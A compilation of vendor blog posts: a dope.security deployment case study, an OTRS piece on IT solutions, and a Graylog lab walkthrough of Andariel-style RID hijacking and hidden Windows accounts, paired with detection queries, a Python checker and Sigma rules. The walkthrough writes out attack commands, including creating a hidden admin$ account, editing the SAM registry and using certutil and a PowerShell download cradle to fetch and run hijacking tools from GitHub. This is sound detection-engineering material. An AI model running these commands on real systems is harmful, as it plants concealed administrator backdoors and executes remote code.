
Fortune 100 Company Successfully Deploys dope.security on 18k+ Devices in Record Time

Deploying a security tool at any company is not straightforward. It’s a balancing act that requires the right combination of product stability, technical integrations, skilled personnel on both sides, and many other variables. This becomes increasingly challenging if you are a large enterprise customer.

These are just a few of the challenges that can come up:

1. Customization and Integration Requirements

Tailored Needs

Each organization has unique security requirements, so off-the-shelf tools often need heavy customization to meet specific needs. Enterprises can have several pre-existing security tools and general applications in both cloud and hybrid environments, making it necessary to integrate new incoming tools with these existing SIEM systems, firewalls, VPNs, and more. For example, part of this integration could be setting up SSL Inspection bypasses for certain applications or changing computer networking paths so that they don’t break a VPN.

2. Resource and Expertise Constraints

Limited Security Personnel

Legacy systems can be complex to deploy and manage on an ongoing basis and, therefore, require a dedicated team. Not all organizations can afford or have the existing team hierarchy to support this. This can make large-scale deployments, especially in enterprises with thousands of employees, expensive from a time and cost perspective. Since most legacy tools are too complex, organizations must invest in dedicated teams around the globe to maintain them or hire expensive third-party services to run the deployment.

3. Maintenance and Continuous Updating

Frequent Updates

Cybersecurity tools require regular updates to stay effective against external threats and meet internal needs. Manually coordinating these with the company through phased deployments, auto-upgrades, and uploads into tools like Intune can be tough and time-consuming. Within the tool itself, slow feedback on configurations can drastically slow down deployments. These configurations can include things like policy updates. Legacy tools have a polling mechanism that takes 30 minutes to an hour to pull the latest policy down from the cloud. This means longer wait times for updates to take effect.

4. Re-work when moving from POC to Production

Non-Production Trials

Most cybersecurity POC environments are shut down after the trial. After purchase, the customer receives a completely fresh production tenant to be re-configured to fit the environment. It can be frustrating, as all work to date is thrown away, including SSO configs, policies, and more.

How does dope.security handle these challenges?

dope.security enabled a Fortune 100 customer to deploy the dope agent at an average of 3,000 devices per week and grow from 900 devices to over 18,000 devices in a matter of weeks by focusing on four key areas.

1. Product Stability

dope.security has built an on-device SSL proxy that performs all SWG capabilities on the user’s laptop—URL Filtering, Cloud App Controls, SSL Inspection, and more. This refreshed architecture, which removes the need for backhauling data to a remote data center, makes dope.swg the most reliable and stable proxy available regardless of the state, country, or office you’re in. The Fly-Direct Architecture also makes policy configurations very stable, consistent, and fast, which is critical during deployments. Updating policies in real-time at the individual and group levels makes the entire rollout process much more efficient and quicker. It also ensures the right security policies are applied to the correct individuals instantly.

2. Deployment Experience

Deploying the dope.security agent is extremely easy whether you’re installing 200 or 20,000 devices because there is no manual configuration or customization a customer has to make before installing.

In this specific case, the customer easily deployed the agent silently via Intune across their organization. Because no extra configuration was required after the agent was installed, the customer instantly blocked malicious websites and traffic across their deployed devices. Our clear guide to Intune deployments answered any frequently asked questions.

The entire process from the initial free production trial was one click without excessive help from the dope security team. After purchase, the same trial was converted into a paid account—no additional configuration was required.

3. Global Technical Support Team

First, dope.security focuses on building strong relationships with the customer implementation team. This means having regular check-ins either through status calls, dedicated Slack channels, or email. Regular check-ins ensure that no bug or deployment hurdle goes unnoticed.

Second, the dope.security technical team consists only of product engineers who have in-depth knowledge of the product and how it works. There are no generic Tier 1 support agents whose only job is to escalate a customer to the next tier for assistance. This means the technical support team can answer any question in real time, dramatically increasing the productivity and speed of resolving issues.

4. SSL Error Notifications

A very common issue with proxy deployments is errors caused by SSL Inspection breaking applications. Typically, the fix is to implement a bypass rule. But with most SWG providers, this is extremely manual and not straightforward.

dope.security simplified this and built an SSL notification feature. The dope agent identifies and reports when it has broken traffic due to SSL cert pinning. It allows the admin to view these SSL errors in the dope console and easily create either application or domain bypasses in a few clicks. This feature is unique to dope.security, enabling deployments to move much quicker as admins don’t need to spend time manually hunting for why specific applications are breaking and their associated domains, URLs, or extensions to create bypass lists. dope.security automatically identifies, reports, and provides the data you need directly in the console.


This Fortune 100 customer rollout is just one case that shows how dope.security has redefined cybersecurity deployments. It no longer needs to be an extremely long, arduous process that requires tons of resources, time, and effort. From initial onboarding to ongoing maintenance of the deployment, dope.security makes everything much simpler through product stability, understanding customer needs, and providing dedicated, knowledgeable support.

About Dope Security
A comprehensive security solution designed to protect individuals and organizations from various cyber threats and vulnerabilities. With a focus on proactive defense and advanced technologies, Dope Security offers a range of features and services to safeguard sensitive data, systems, and networks.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

IT Solutions: How companies benefit from them


What are IT solutions?

“That’s the solution!” is how an IT solution should ideally feel. It should solve an existing problem, lead to process optimization or ensure efficient target achievement.

On the technical side, this includes the following:

  • software
  • hardware 
  • data
  • infrastructure, and
  • security mechanisms.

On a qualitative level, these factors include:

  • consulting
  • integration
  • support, and 
  • other services, as necessary. 

Examples include ERP systems, cloud services, IT security solutions, databases, communication platforms and automation tools. 

IT solutions: Definition

An IT solution is a comprehensive approach that goes beyond the mere application of software. It combines components such as hardware, infrastructure, services, integration, support or consulting. It is often individually tailored to a company in order to meet its specific needs.

An IT solution is different from software because it is a complex concept. It may comprise several software products and other elements.


What types of problems are solved?

In the corporate world, there are countless problems and opportunities to use information technology in a meaningful way. It is important that an IT solution brings peace of mind to business owners. 

IT solutions: Examples

The following examples use specific categories to illustrate the types of IT solutions available. Each type addresses specific requirements in companies or organizations.

Example #1: Information centralization

These include solutions such as ERP, CRM and HR systems. These are comprehensive, scalable IT solutions that meet the complex requirements of large companies. They integrate various systems and processes, such as financial management, customer relationship management (CRM) or human resources (HR). One of the aims is to manage data centrally and optimize company-wide processes.

Example #2: Data management

Data management solutions help companies organize, store, protect and analyse data effectively and purposefully. In the best case scenario, better decisions can be made based on this and processes can be sensibly revised.

Example #3: Increased IT security

Protecting systems and networks from threats such as hacker attacks or malware is of fundamental importance. The spectrum ranges from firewalls, encryption, analysis and incident identification to comprehensive protection of sensitive company data through an Information Security Management System (ISMS).

Example #4: Communication and collaboration

In the modern corporate world, business has changed. Remote work and large geographical distances are now the norm. Team members must communicate with each other and external parties in a targeted manner. 

By using the right communication and collaboration platforms a strong culture is developed. This also improves the quality of collaboration.

Example #5: Automation and AI

Artificial intelligence (AI) and process automation lead to better outputs. For example, companies benefit from AI chatbots for support or use machine learning for better workflows. The list of benefits of artificial intelligence is long. Related solutions should always focus on the practical benefits.

Example #6: E-commerce

An e-commerce solution supports companies in setting up and operating online stores. It includes functions such as product management, payment processing, ordering processes and marketing tools. An important goal is to offer customers a seamless shopping experience. 

Example #7: Industry-specific solutions

An industry-specific IT solution optimizes processes according to specific requirements. Examples of this include electronic patient records in the healthcare sector or trading systems in the financial sector. In most cases, the aim is to be competitive within one’s own industry or to offer clients a good service.

Application in large companies

Large companies (enterprises) usually have complex IT environments. Each department usually has its own requirements, prerequisites and success metrics. 

Needless to say, solutions must cover a wide range of application scenarios. Selected systems must have a wide range of functionalities, be highly scalable and integrate easily.

Examples of enterprise solutions include: 

  • ERP systems – for managing business processes
  • CRM tools for customer relationship management or 
  • Data analysis solutions such as business intelligence platforms. 

Use in small and medium-sized enterprises (SMEs) 

Large companies tend to focus on goals such as process optimization, greater security or staying ahead of the competition. In contrast, small and medium-sized enterprises are increasingly focusing on factors such as:

  • cost savings,
  • process digitalization and
  • driving growth.

These require effective solutions that deliver as much performance as possible at the lowest possible cost. They must also be scalable to support the business as it grows.

Typical IT solutions for SMEs may include:

  • Cloud-based business software such as Microsoft 365, 
  • Collaboration tools such as Slack or Trello, or 
  • CRM systems such as HubSpot.

However, IT security also plays an important role here. And, depending on their model, e-commerce solutions, such as web store services, may be practical. 

Customized IT solutions

It’s like clothing: Tailor-made fits best. 

IT service providers can develop options that are individually tailored to specific company needs. These are highly beneficial when there are unique business processes for which a standard offering is not sufficient. For example, automation of a unique business process may be developed individually. 

Of course, a cost-benefit analysis would reveal whether this is possible. In commercial terms, the ROI must be calculated before such a project begins.

Sometimes, these are created in-house. These can be helpful as an interim answer. This gives room for advance planning that will support the longer-term business goals. 


Tip: Since customized solutions also mean a high cost factor, it is advisable to choose an IT solution that can be easily adapted to individual needs and requirements.


What does your business need today?

When investing in a new solution, it should deliver on an overarching benefit. Examples may be better service provision, reliable security or concrete time savings.

Below are some key benefits to consider. 

1. Greater efficiency

Companies strive for productive and effective work. They also aim for the best possible results with the least possible effort – efficiency. In concrete terms, optimizing or automating processes can save a lot of time, money and resources. At the same time, optimized processes lead to better results. 

2. Increased customer satisfaction

The customer is king. Companies depend on the loyalty of their customers. By using the right tools, processes and training customer satisfaction increases. 

An example of using a solution would be improving communication or enabling personalized services and quick responses to inquiries. A self-service portal, for example, can guide customers quickly to the answers they are looking for.  

3. Competitive advantage

The right IT solution helps companies gain valuable advantages over the competition. For example, automated processes or targeted workflow management can lead to faster and more cost-effective work. AI and IoT technologies also make it possible to develop new products, services or business models.

4. More security and compliance

The right IT solutions lead to better security in a variety of ways. Examples include data encryption, access controls, backups and restores. 

Professional device management – the proper administration of various devices – also provides effective protection against unauthorized access or data loss. 

In addition, the right IT solutions support compliance with legal requirements, which is particularly important in highly regulated industries.

5. Better decision-making

IT can pave the way for clarity and documentation of data that drives better decisions. 

Data can “nudge” targeted user behavior. Applications such as AI-based summaries can provide a quick overview of complex processes. This means a quick decision about the next step can be made. 

Remember: the cost-benefit ratio must be right 

IT solutions offer many other solutions too. Examples include an optimized user experience, 24/7 service and cost savings through proven IT solution providers.

But it is crucial that the cost-benefit ratio is high. Companies should have clarity on how they will benefit from selected solutions. Where this can vary greatly from company to company, steps such as a company-specific selection make sense.

Solving customer problems

OTRS offers customized IT solutions that can be used for many different purposes across all industries. Through good adaptability, fast implementation and reliable local support OTRS customers solve a vast number of operational problems. 


Areas in which OTRS Group often works include:

Conclusion: Apply technology for success

If you have a problem, you should look for a suitable solution as quickly as possible – and find it. This is no different in IT. The subtle difference is that IT often forms the basis for a company’s success. 

It is important to point out the difference between pure software and an IT solution. A solution solves a business problem by using software, services, processes and more. 

Users benefit from the focus on finding benefit-oriented answers to their problems. This includes options that improve processes and workflows, security, and data-driven decisions.

Find out how you can best benefit from OTRS IT solutions.


About OTRS

OTRS (originally Open-Source Ticket Request System) is a service management suite. The suite contains an agent portal, admin dashboard and customer portal. In the agent portal, teams process tickets and requests from customers (internal or external). There are various ways in which this information, as well as customer and related data can be viewed. As the name implies, the admin dashboard allows system administrators to manage the system: Options are many, but include roles and groups, process automation, channel integration, and CMDB/database options. The third component, the customer portal, is much like a customizable webpage where information can be shared with customers and requests can be tracked on the customer side.


Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users

Researchers at AhnLab Security Intelligence Center (ASEC) recently published a report on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, that has been leveraging RID hijacking and user account concealment techniques in its operations to stealthily maintain privileged access to compromised Windows systems.

 

This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel’s attack chain, and how Graylog Security can be used to detect and analyze similar activity in an organization’s network.

 

What is RID Hijacking?

The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user’s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.

RID hijacking is a technique discovered by Sebastian Castro that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.

This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.

However, there is a caveat to the technique – it requires SYSTEM-level privileges to access and modify user information in the SAM, which resides in a protected registry key.

 

Attack Demonstration

According to the report from AhnLab, the threat actor’s RID hijacking process consists of the following stages. We’ll use this model as we walk through the attack in a lab environment.

RID Attack Demonstration

The RID Hijacking attack process referenced from AhnLab

 

Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.

 

System, Security, and PowerShell/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.

 

Stage 1: SYSTEM Privilege Escalation

 

We’ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft Sysinternals tool often abused by adversaries for lateral movement and privilege escalation. We’ll spawn a PowerShell session using PsExec with the -s argument:

 

PsExec.exe -s -i powershell.exe

 

The output of whoami /user in the shell confirms that we’re now running as SYSTEM.

Whoami Output  

In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.

Command Executed  

Stage 2: Create User Account

 

Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:

net user admin$ admin@123 /add
net localgroup "Remote Desktop Users" "admin$" /add
net localgroup "Administrators" "admin$" /add

 

The trick to hiding the user here is the $ at the end of the username. It’s an old-school technique that imitates computer accounts, which are hidden from some user listing options – note that the newly created user isn’t shown in the output of net user.

net user

In Graylog we see the commands as event ID 4688 labeled as “process started”, and additional labels for 4720 “account created” and 4732 “group member added”.

ID 4688 and 4720

 

Stage 3: Modify the RID Value in Registry

 

Before demonstrating the RID hijack, let’s see what the current RID value and permissions are for the user admin$. We’ll open a separate command prompt and spawn a shell as that user using runas:

runas /user:admin$ cmd

 

Then, execute whoami commands in that shell. As shown, the user’s current RID is 1009 and its privileges are limited as expected for a standard user.

RID Value

Well, as the chefs say, elevate it!

 

Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.

 

User information is stored in the SAM hive in unique subkeys under:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

 

Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we’re looking at the key 000003F1.

Hex Value

Within key 000003F1 the actual RID can be found in the value F which contains binary data. As highlighted, the RID value is located at offset 30 and stored in little-endian format.

SAM Key

To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.

Hex Key Value

 

 

With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami /user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami /priv shows that the user has been granted admin privileges.

RID 500
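As an added example (not code from the Graylog post, the AhnLab report or either tool), the same key-name-versus-F-value relationship can be checked offline over a `reg export` of the Users key, which is useful when triaging a SAM hive from a suspect host. It assumes the layout described above: user keys named after the hex RID and the RID repeated inside F at offset 0x30 as a 32-bit little-endian integer; the .reg content below is constructed, not a real export.

```python
r"""Offline RID-hijack check over a SAM export made with reg.exe.

Assumes user keys under HKLM\SAM\SAM\Domains\Account\Users are named after
the hex RID (000003F1 == 1009) and that the binary value F repeats the RID
at offset 0x30 (shown as 30 in regedit) as a 32-bit little-endian integer.
A hijacked account is one whose key name and F value disagree.
"""
import re
import struct

RID_OFFSET = 0x30
USERS_PATH = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
F_PREFIX = '"F"=hex:'


def parse_reg_export(text):
    """Map each RID-named user key in a .reg export to the raw bytes of its F value."""
    users = {}
    current_key = None   # 8-hex-digit key name while inside a user key, else None
    hex_buf = None       # accumulates a backslash-continued hex value
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            leaf = path.rsplit("\\", 1)[-1]
            inside_users = path.upper().startswith(USERS_PATH.upper() + "\\")
            is_rid_key = inside_users and re.fullmatch(r"[0-9A-Fa-f]{8}", leaf)
            current_key = leaf if is_rid_key else None
            hex_buf = None
            continue
        if current_key is None:
            continue
        if line.startswith(F_PREFIX):
            hex_buf = line[len(F_PREFIX):]
        elif hex_buf is not None:
            hex_buf += line            # continuation line of the F value
        else:
            continue                   # some other value (V, etc.): ignored
        if hex_buf.endswith("\\"):
            hex_buf = hex_buf[:-1]     # reg.exe wraps long values with a trailing backslash
        else:
            users[current_key] = bytes.fromhex(hex_buf.replace(",", ""))
            hex_buf = None
    return users


def rid_in_f(f_bytes):
    """RID stored inside F (32-bit little-endian at offset 0x30)."""
    if len(f_bytes) < RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID")
    return struct.unpack_from("<I", f_bytes, RID_OFFSET)[0]


def find_hijacked(users):
    """Return (key_name, rid_from_key_name, rid_in_f) for every key whose F disagrees."""
    hits = []
    for key_name, f_bytes in users.items():
        key_rid = int(key_name, 16)
        f_rid = rid_in_f(f_bytes)
        if key_rid != f_rid:
            hits.append((key_name, key_rid, f_rid))
    return hits


# --- constructed sample export (not a real SAM dump) ---------------------------
def make_f_value(rid, size=0x50):
    """Zeroed F value of the usual size with only the RID field set (constructed)."""
    buf = bytearray(size)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def format_f_value(f_bytes, per_line=16):
    """Render F the way reg.exe writes hex values: comma-separated, backslash-wrapped."""
    pairs = [f"{b:02x}" for b in f_bytes]
    chunks = [",".join(pairs[i:i + per_line]) for i in range(0, len(pairs), per_line)]
    return F_PREFIX + ",\\\n  ".join(chunks)


SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    f"[{USERS_PATH}\\000003E9]",        # ordinary user: key name 1001, F says 1001
    format_f_value(make_f_value(1001)),
    "",
    f"[{USERS_PATH}\\000003F1]",        # admin$: key name 1009, but F now carries 500
    format_f_value(make_f_value(500)),
    "",
    f"[{USERS_PATH}\\Names\\admin$]",   # Names subkey is not a RID key and is skipped
    "@=hex(3f1):",
])

if __name__ == "__main__":
    for key_name, key_rid, f_rid in find_hijacked(parse_reg_export(SAMPLE_EXPORT)):
        print(f"key {key_name} (RID {key_rid}) carries RID {f_rid} in F: possible hijack")
```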

We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:

NOT user_name:administrator AND user_id:/.*\-500/

Administrator user 500

This query might produce false positives if the Administrator account has been renamed. We can narrow it to target both RID hijacking and user accounts mimicking machine names:

user_name:/.*\$/ AND user_id:/.*\-500/

 

Custom and Open-source Tooling

AhnLab Report

Manually altering SAM user information in the registry editor is good for demonstration, but it isn’t necessarily what threat actors are doing.

 

The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on GitHub.

 

AhnLab breaks down the differences between the tools quite well in its report:

AhnLab Report
Differences in tool behavior referenced from AhnLab

 

 

CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.

 

 

Let’s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX-packed variant to the Windows host.

 

certutil.exe -urlcache -split -f https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe

 

The command line arguments require the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we’re again creating the user admin$ and targeting the local admin RID.

CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator

Create Hidden Account

 

The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.

Regini Being Used

Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we see the tool deleting the hidden user then silently importing a .reg file using regedit. What’s happening here is that the tool already populated the import file with information from the user registry key before it was deleted, and modified the RID in the file to match Administrator’s. This is an additional step to hide the created user as once the registry key is restored, the user becomes hidden from additional user list interfaces.

Enumeration Events

Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.

Tool Execution

This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection – while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.

 

Nonetheless, it’s useful in a threat hunt or to detect the vanilla tool. We can use the following query:

process_command_line:(/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\.ini/ OR /.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\.reg/)

Process Command Line

 

The tool by itself doesn’t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some damning results.

VirusTotal

 

Further Attempts to Hide Users

 

In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we’ll carry out the technique separately and see what can be gleaned from the logs.

 

As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch a RID hijacking script from GitHub and execute it in memory. This leaves us with an account that has been given administrator privileges but with no further action taken to conceal it.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/r4wd3r/RID-Hijacking/master/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500

Powershell Script Run

 

Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.

Fake Computer Name

Even with the fake computer name, the hidden user still shows up in Computer Management.

Computer Fake Name

 

Following along with the Andariel threat group’s tool methods, we run commands to:

 

A) Fetch the hidden user’s RID

Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID

 

B) Export the hidden user’s associated registry keys in the SAM hive

reg export hklm\sam\sam\domains\account\users\names\admin$ names.reg
reg export hklm\sam\sam\domains\account\users\0000XXXX users.reg

 

C) Delete the user

net user admin$ /delete

 

D) Restore the user by importing the registry files containing the user keys information

reg import names.reg
reg import users.reg

 

By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.

No Admin User Shown

 

Every step of the execution can be seen in Graylog.

Attack Steps Log

 

Detections

 

We’ve provided Sigma rules below to detect the following aspects of the attack chain:

 

  • Hidden user account with Administrator RID
  • RID hijacking via CreateHiddenAccount
  • Export of SAM users registry keys via reg.exe

 

With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.

 

The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.

Sigma Rule Added

Rule #1

title: Illuminate - Hidden User Account With Administrator RID
id: 531bfab7-d18c-4f51-bae0-64cf38cae3d5
status: experimental
description: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
detection:
    selection_event:
        EventID: 4672
    selection_name:
        SubjectUserName|endswith: '$'
    selection_rid:
        SubjectUserSid|endswith: '-500'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Rule #2

title: Illuminate - RID Hijacking Via CreateHiddenAccount
id: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b
status: experimental
description: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking
references:
    - https://github.com/wgpsec/CreateHiddenAccount/
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege_escalation
    - attack.t1078
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini
            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg
    condition: selection
falsepositives:
    - Unknown
level: high

Rule #3

title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe
id: 0709625a-4703-47ba-acfd-3beaa4d0f1dc
status: experimental
description: Detects export of SAM user account information via reg export
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.credential_access
    - attack.t1003.002
    - attack.persistence
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:   # both substrings must be present; a plain list would be OR-ed and fire on any reg export
            - 'export'
            - 'hklm\sam\sam\domains\account\users\'
    condition: selection
falsepositives:
    - Administrative scripts or forensic investigations
level: high
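
To see what these selections actually match, here is a small Python matcher, added as an example and not part of Graylog's rules or of the Sigma tooling. It implements only the modifiers the three rules use (exact value, endswith, contains, contains|all) and Sigma's case-insensitive string matching, and runs them over constructed events: the field names follow the Sigma Windows taxonomy the rules use, while the SIDs, account names and command lines are made up. It also shows why the SAM export selection needs the |all modifier: Sigma ORs a list of values under a single field, so a plain CommandLine|contains list with 'export' in it also fires on any unrelated reg export.

```python
"""Minimal Sigma-style matcher for the three rules above.

Added example, not Graylog's code or the Sigma project's reference
implementation. It models only the modifiers those rules use (exact value,
endswith, contains, contains|all) and Sigma's case-insensitive matching.
Field names follow the Sigma Windows taxonomy used in the rules; every
event below is constructed sample data, not real telemetry.
"""
from typing import Any, Dict, List

Event = Dict[str, Any]


def field_matches(value: Any, spec_key: str, expected: Any) -> bool:
    """Apply one 'Field|modifier' spec to one event field value.

    A list of expected values is OR-ed, as in Sigma, unless the 'all'
    modifier is present, in which case every value must match.
    """
    if value is None:            # field absent from the event: no match
        return False
    text = str(value).lower()
    modifiers = spec_key.split("|")[1:]
    values = expected if isinstance(expected, list) else [expected]
    if "endswith" in modifiers:
        tests = [text.endswith(str(v).lower()) for v in values]
    elif "contains" in modifiers:
        tests = [str(v).lower() in text for v in values]
    else:
        tests = [text == str(v).lower() for v in values]
    return all(tests) if "all" in modifiers else any(tests)


def selection_matches(event: Event, selection: Dict[str, Any]) -> bool:
    """Every field spec inside a selection map must hold (Sigma map = AND)."""
    return all(
        field_matches(event.get(spec.split("|")[0]), spec, expected)
        for spec, expected in selection.items()
    )


# Rule #1: 'all of selection*' means each named selection must match.
HIDDEN_ADMIN_RID = {
    "selection_event": {"EventID": 4672},
    "selection_name": {"SubjectUserName|endswith": "$"},
    "selection_rid": {"SubjectUserSid|endswith": "-500"},
}

SAM_USERS_PATH = "hklm\\sam\\sam\\domains\\account\\users\\"
# Plain list under one field: either substring is enough (OR).
SAM_EXPORT_OR = {"CommandLine|contains": ["export", SAM_USERS_PATH]}
# With |all, both substrings must appear (AND), which is the intended logic.
SAM_EXPORT_ALL = {"CommandLine|contains|all": ["export", SAM_USERS_PATH]}

SAMPLE_EVENTS: List[Event] = [
    # Constructed 4672: hidden account whose SID ends in the Administrator RID
    {"EventID": 4672, "SubjectUserName": "admin$",
     "SubjectUserSid": "S-1-5-21-1000000001-1000000002-1000000003-500"},
    # Constructed 4672: machine account, trailing '$' but an ordinary RID
    {"EventID": 4672, "SubjectUserName": "WKSTN01$",
     "SubjectUserSid": "S-1-5-21-1000000001-1000000002-1000000003-1105"},
    # Constructed 4672: built-in Administrator, RID 500 but no trailing '$'
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "SubjectUserSid": "S-1-5-21-1000000001-1000000002-1000000003-500"},
    # Constructed process-creation events (one attack-style, two benign)
    {"EventID": 1, "CommandLine": "reg export " + SAM_USERS_PATH + "names\\admin$ names.reg"},
    {"EventID": 1, "CommandLine": "reg export HKCU\\Software\\Contoso settings.reg"},
    {"EventID": 1, "CommandLine": "reg query " + SAM_USERS_PATH + "names"},
]


def hidden_admin_rid_hits(events: List[Event]) -> List[str]:
    """Account names for which every selection of Rule #1 matches."""
    return [str(e["SubjectUserName"]) for e in events
            if all(selection_matches(e, sel) for sel in HIDDEN_ADMIN_RID.values())]


def command_line_hits(events: List[Event], selection: Dict[str, Any]) -> List[str]:
    """Command lines matched by a single-selection process-creation rule."""
    return [str(e["CommandLine"]) for e in events if selection_matches(e, selection)]


if __name__ == "__main__":
    print("Rule #1 hits:", hidden_admin_rid_hits(SAMPLE_EVENTS))
    print("SAM export, OR list:", command_line_hits(SAMPLE_EVENTS, SAM_EXPORT_OR))
    print("SAM export, |all:", command_line_hits(SAMPLE_EVENTS, SAM_EXPORT_ALL))
```

Run as-is, Rule #1 fires only on the constructed admin$ logon (the machine account has the trailing $ but not RID 500, the built-in Administrator has RID 500 but no $), while the OR-ed SAM export selection matches all three process events and the |all version matches only the actual SAM export. The second and third rules key on process creation, so they only fire where command-line logging (Sysmon event 1 or Security 4688 with command-line auditing) is in place.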

Graylog Detections

Graylog has provided the Sigma rules here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, Dashboards, and other content to meet various security use cases. For more about Sigma rules, see our recent blog, “The Ultimate Guide to Sigma Rules”.

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

